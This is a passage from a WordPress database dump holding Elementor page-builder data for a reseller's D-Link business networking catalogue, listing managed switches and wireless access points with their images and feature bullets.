]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7431,3390,'_elementor_version','2.5.14'),(7432,3390,'_elementor_edit_mode','builder'),(7435,3391,'_wp_page_template','template-fullwidth.php'),(7436,3391,'_elementor_template_type','post'),(7437,3391,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"290\",\"right\":\"290\",\"bottom\":\"290\",\"left\":\"290\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"65\",\"bottom\":\"65\",\"left\":\"65\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" 